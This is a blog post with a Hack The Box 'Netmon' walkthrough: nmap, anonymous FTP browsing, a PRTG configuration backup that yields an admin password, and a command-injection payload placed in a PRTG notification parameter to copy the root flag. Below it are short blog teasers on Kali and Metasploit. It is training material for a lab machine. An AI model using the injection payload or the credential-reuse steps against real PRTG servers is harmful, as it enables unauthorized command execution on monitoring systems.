HTB-Netmon(writeup)

-


Hack The Box - Netmon

Hey guys today Netmon retired and here’s my writeup on the machine. It was a easy machine that’s everything I can say about it.
IP of the Box : 10.10.10.152


As always we will start with nmap to scan for open ports and services :
nmap –sC –sV –A 10.10.10.152

We got ftp on port 21, http on port 80 and smb. The most interesting thing is that anonymous login is allowed on ftp. 

For user.txt

root@kali:~/Desktop/HTB/boxes/netmon# ftp 10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19  12:18AM                 1024 .rnd
02-25-19  10:15PM       <DIR>          inetpub
07-16-16  09:18AM       <DIR>          PerfLogs
02-25-19  10:56PM       <DIR>          Program Files
02-03-19  12:28AM       <DIR>          Program Files (x86)
02-03-19  08:08AM       <DIR>          Users
02-25-19  11:49PM       <DIR>          Windows
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-25-19  11:44PM       <DIR>          Administrator
06-28-19  06:43AM       <DIR>          Public
226 Transfer complete.
ftp> cd Public
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19  08:05AM       <DIR>          Documents
07-16-16  09:18AM       <DIR>          Downloads
07-16-16  09:18AM       <DIR>          Music
07-16-16  09:18AM       <DIR>          Pictures
06-28-19  06:49AM                   82 tester.txt
02-03-19  12:35AM                   33 user.txt
07-16-16  09:18AM       <DIR>          Videos
226 Transfer complete.
ftp> get user.txt
local: user.txt remote: user.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 1 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
33 bytes received in 0.07 secs (0.4790 kB/s)
ftp>


cat User.txt: dd58ce67b49e15105************

Now getting root.txt
So Now in the ftp login we found something interesting which is PRTG Network Monitor Credentials

ftp> ls -al
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19  08:05AM       <DIR>          Application Data
02-03-19  08:05AM       <DIR>          Desktop
02-03-19  08:05AM       <DIR>          Documents
02-03-19  12:15AM       <DIR>          Licenses
11-20-16  10:36PM       <DIR>          Microsoft
02-03-19  12:18AM       <DIR>          Paessler
02-03-19  08:05AM       <DIR>          regid.1991-06.com.microsoft
07-16-16  09:18AM       <DIR>          SoftwareDistribution
02-03-19  08:05AM       <DIR>          Start Menu
02-03-19  12:15AM       <DIR>          TEMP
02-03-19  08:05AM       <DIR>          Templates
11-20-16  10:19PM       <DIR>          USOPrivate
11-20-16  10:19PM       <DIR>          USOShared
02-25-19  10:56PM       <DIR>          VMware
226 Transfer complete.
ftp> cd Application Data/Paessler/PRTG Network Monitor
250 CWD command successful.
ftp> ls -la
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19  12:40AM       <DIR>          Configuration Auto-Backups
06-28-19  06:24AM       <DIR>          Log Database
02-03-19  12:18AM       <DIR>          Logs (Debug)
02-03-19  12:18AM       <DIR>          Logs (Sensors)
02-03-19  12:18AM       <DIR>          Logs (System)
06-28-19  06:24AM       <DIR>          Logs (Web Server)
02-25-19  08:01PM       <DIR>          Monitoring Database
06-28-19  06:54AM              1287578 PRTG Configuration.dat
02-25-19  10:54PM              1189697 PRTG Configuration.old
07-14-18  03:13AM              1153755 PRTG Configuration.old.bak
06-28-19  06:25AM              1647701 PRTG Graph Data Cache.dat
02-25-19  11:00PM       <DIR>          Report PDFs
02-03-19  12:18AM       <DIR>          System Information Database
02-03-19  12:40AM       <DIR>          Ticket Database
02-03-19  12:18AM       <DIR>          ToDo Database
226 Transfer complete.
ftp> get "PRTG Configuration.old.bak"
local: PRTG Configuration.old.bak remote: PRTG Configuration.old.bak
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1153755 bytes received in 3.04 secs (370.2494 kB/s)
ftp>

I got the password which was PrTg@dmin2018  :
So at first the password does not work then I thaught that it is old backup file so after some attempts I changed it to PrTg@dmin2019 and it worked :





We need to go to the notifications settings on our web browser
Click “Setup”--> Click “Notifications” in “Account Settings”-->Click “Add new notification”-->Enable “Execute Program”-->Select “Demo exe notification - outfile.ps1” as the “Program File”
   Now change the parameter to test.txt; Copy-item "C:\Users\Administrator\Desktop\root.txt" -Destination "C:\Users\Public\root.txt" 
We have to create a useless notification to exploit the vulnerability.
So root.txt: 3018977fb944b**************


Comments

Post a Comment

Popular posts from this blog

Changing Hostname in Kali Linux

-
Image
  Step1: Change in hostname fi le Change hostname fi le using nano or any other text editor  Path: /etc/hostname Command: sudo nano /etc/hostnam e Change the name from Kali → anyname Save the fi le Step2: Edit Hosts File Change Name in Hosts fi le  Path: /etc/hosts Command: sudo nano /etc/hosts Change kali to the same name as mentioned in hostname  fi le Remember all the changes can be done only in sudo  Now reboot the system to save the changes After Reboot check terminal
Read more

Best Linux distribution to start journey as pentester

-
Image
So in this post, I am describing some of the best Linux Distribution and my personal favorite distribution. Let's get started   Kali Linux: One of the best Operating system with thousands of tools which helps in Pentesting. Developed by Offensive Security, Kali Linux distro tops our list of the best operating systems for hacking purposes. This Debian-based OS comes more than 600 preinstalled pen testing tools that make your security toolbox even more advanced. These efficient tools are updated regularly like Nmap, Metasploit, etc and are available for different platforms like VirtualBox and VMware . Download  Kali Linux Parrot Security OS: This is also the best Operating system with thousands of tools which helps in Penetration testing. This distribution is designed for ethical hacking, pen testing, computer forensics, ethical hacking, cryptography, etc. Compared to others, Parrot Security OS promises lightweight OS that is highly efficient. Downloa...
Read more

Learn Metasploit

-
Image
Link to the room -  https://tryhackme.com/room/rpmetasploit Task1 #1  Kali and most other security distributions of Linux include Metasploit by default. If you are using a different distribution of Linux, verify that you have it installed or install it from the Rapid 7 Github repository. Answer:Not Required Task 2(Initializing) #1 First things first, we need to initialize the database! Let's do that now with the command: Command: msfdb init Answer:Not Required #2 Before starting Metasploit, we can view some of the advanced options we can trigger for starting the console. Check these out now by using the command: Command: msfconsole -h (-h is for help )  Answer: Not Required #3 We can start the Metasploit console on the command line without showing the banner or any startup information as well. What switch do we add to msfc...
Read more

Followers